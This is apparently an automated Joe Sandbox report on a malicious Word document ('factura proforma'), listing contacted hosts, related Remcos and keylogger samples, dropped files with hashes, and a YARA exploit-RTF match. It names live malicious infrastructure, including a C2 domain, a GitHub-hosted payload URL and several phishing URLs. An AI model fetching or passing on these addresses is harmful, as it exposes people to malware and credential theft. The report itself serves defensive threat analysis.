                                                                                  http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.msn.com/advertisement.ad.jsbhv77DF.tmp.15.drfalse
                                                                                    unknown
                                                                                    http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.78.54
                                                                                      unknownUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      45.90.89.98
                                                                                      maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proBulgaria
                                                                                      33657CMCSUStrue
                                                                                      185.199.109.133
                                                                                      raw.githubusercontent.comNetherlands
                                                                                      54113FASTLYUSfalse
                                                                                      91.134.96.177
                                                                                      unknownFrance
                                                                                      16276OVHFRtrue
                                                                                      178.237.33.50
                                                                                      geoplugin.netNetherlands
                                                                                      8455ATOM86-ASATOM86NLfalse
                                                                                      172.67.216.244
                                                                                      og1.inUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1522666
                                                                                      Start date and time:2024-09-30 14:59:05 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 30s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:19
                                                                                      Number of new started drivers analysed:1
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:factura proforma .docx.doc
                                                                                      Detection:MAL
                                                                                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winDOC@20/31@10/6
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 71.4%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 173
                                                                                      • Number of non-executed functions: 315
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .doc
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Override analysis time to 79324.6110084458 for current running targets taking high CPU consumption
                                                                                      • Override analysis time to 158649.222016892 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3796 because there are no executed function
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      TimeTypeDescription
                                                                                      09:00:14API Interceptor35x Sleep call for process: EQNEDT32.EXE modified
                                                                                      09:00:16API Interceptor102x Sleep call for process: powershell.exe modified
                                                                                      09:00:16API Interceptor15x Sleep call for process: wscript.exe modified
                                                                                      09:00:24API Interceptor9258701x Sleep call for process: RegAsm.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.78.54PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                          SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                              PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    45.90.89.98AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                      gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                        17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                          1726170845fe5c472375696bf668b3b528e9effd5f9dfb1a2108bcc6e243a091f1afc5c794629.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            xnHel.rtfGet hashmaliciousRemcosBrowse
                                                                                                              PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                                                                                August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                                                                    M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                                                                      oothgirl.docGet hashmaliciousRemcosBrowse
                                                                                                                        185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        og1.inPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proAWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.90.89.98
                                                                                                                        17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 45.90.89.98
                                                                                                                        raw.githubusercontent.comRFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                        • 185.199.110.133
                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                        • 185.199.110.133
                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                        • 185.199.111.133
                                                                                                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.111.133
                                                                                                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.111.133
                                                                                                                        4xBq1SMyQt.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 185.199.110.133
                                                                                                                        http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        https://33357.github.io/uniswap-v2Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        https://coinbase-auth.netlify.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 185.199.110.133
                                                                                                                        geoplugin.netSecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                        • 178.237.33.50
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CMCSUSSERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 45.66.231.90
                                                                                                                        l.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 45.66.231.185
                                                                                                                        winx86.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 45.66.231.185
                                                                                                                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.90.89.98
                                                                                                                        5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.89.247.65
                                                                                                                        bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                                                                                                        • 45.66.231.89
                                                                                                                        Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.89.247.65
                                                                                                                        9FPFmh6r5t.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 45.66.231.104
                                                                                                                        gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.90.89.98
                                                                                                                        2s7LChrLdV.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        • 45.89.247.65
                                                                                                                        FASTLYUShttps://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                        • 151.101.2.208
                                                                                                                        https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.2.137
                                                                                                                        https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.194.137
                                                                                                                        https://magical-variation-300980.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.130.137
                                                                                                                        https://magical-variation-300980.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.194.137
                                                                                                                        INVOICE DUE..xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.66.137
                                                                                                                        https://content.app-us1.com/5zbe53/2024/09/30/8d9df716-ca99-47ed-825e-d3a2a0e6cd9e.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.2.137
                                                                                                                        Tonincasa Updated Employee sheet .pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.65.224
                                                                                                                        Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                        • 199.232.196.209
                                                                                                                        Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                        • 199.232.196.209
                                                                                                                        OVHFRhttps://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                        • 46.105.222.81
                                                                                                                        https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.56.200.84
                                                                                                                        1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 51.81.194.202
                                                                                                                        https://www.google.ad/amp/clck.ru/3DSSA9?hghgHGHGHJGhghdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousUnknownBrowse
                                                                                                                        • 46.105.222.161
                                                                                                                        https://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 54.38.113.4
                                                                                                                        https://jogosderobloxdematazumbie.blogspot.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 51.210.0.171
                                                                                                                        http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 51.81.221.63
                                                                                                                        https://www.iphone.trustefy.org/Get hashmaliciousUnknownBrowse
                                                                                                                        • 54.38.113.5
                                                                                                                        https://ka.digitalbankbrics.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 5.135.84.192
                                                                                                                        https://elderly-same-archeology.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 54.36.150.185
                                                                                                                        CLOUDFLARENETUShttp://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEqGet hashmaliciousUnknownBrowse
                                                                                                                        • 1.1.1.1
                                                                                                                        https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                        • 104.21.27.6
                                                                                                                        https://techservealliance.orgGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.18.142.119
                                                                                                                        SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.21.90.191
                                                                                                                        https://cganet.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.22.0.204
                                                                                                                        https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                        • 104.21.1.169
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.129.166
                                                                                                                        https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        https://magical-variation-300980.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        05af1f5ca1b87cc9cc9b25185115607dSYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        PO.xlsGet hashmaliciousRemcosBrowse
                                                                                                                        • 104.21.78.54
                                                                                                                        • 185.199.109.133
                                                                                                                        • 172.67.216.244
                                                                                                                        7dcce5b76c8b17472d024758970a406bPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        PO.xlsGet hashmaliciousRemcosBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.216.244
                                                                                                                        No context
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):131072
                                                                                                                        Entropy (8bit):0.02549955617514913
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:I3DPc4yXvxggLR9fTtyOM7pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPhy/J7KvYg3J/
                                                                                                                        MD5:665D119C079815C5C7BA8979D3A0547C
                                                                                                                        SHA1:25D4B1813506623251AD3FA7EFB4A19AEE3FBE27
                                                                                                                        SHA-256:F1D4FD6DAEEFC744F440BEA7E603E736D3DC2243DD3A09E50F1DE5A082522FD5
                                                                                                                        SHA-512:77281F250300E85D64D54B2893DCFC0CB0880808BACB21B8D55A19849B323689650B1D7065ED636A82CFEBC2ED5393B27A3A0937928479B6BDF7B1D8E639E205
                                                                                                                        Malicious:false
                                                                                                                        Preview:......M.eFy...z....7..A...zZ...S,...X.F...Fa.q.............................w6.:.YG..e............<.....H....b'.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4760
                                                                                                                        Entropy (8bit):4.834060479684549
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                        Malicious:false
                                                                                                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):64
                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                        Malicious:false
                                                                                                                        Preview:@...e...........................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        File Type:JSON data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):962
                                                                                                                        Entropy (8bit):5.013811273052389
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                        Malicious:false
                                                                                                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Rich Text Format data, version 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):115666
                                                                                                                        Entropy (8bit):2.7217050368726605
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
                                                                                                                        MD5:5EAD5713E1263695BFF52404264DD3B4
                                                                                                                        SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
                                                                                                                        SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
                                                                                                                        SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, Author: ditekSHen
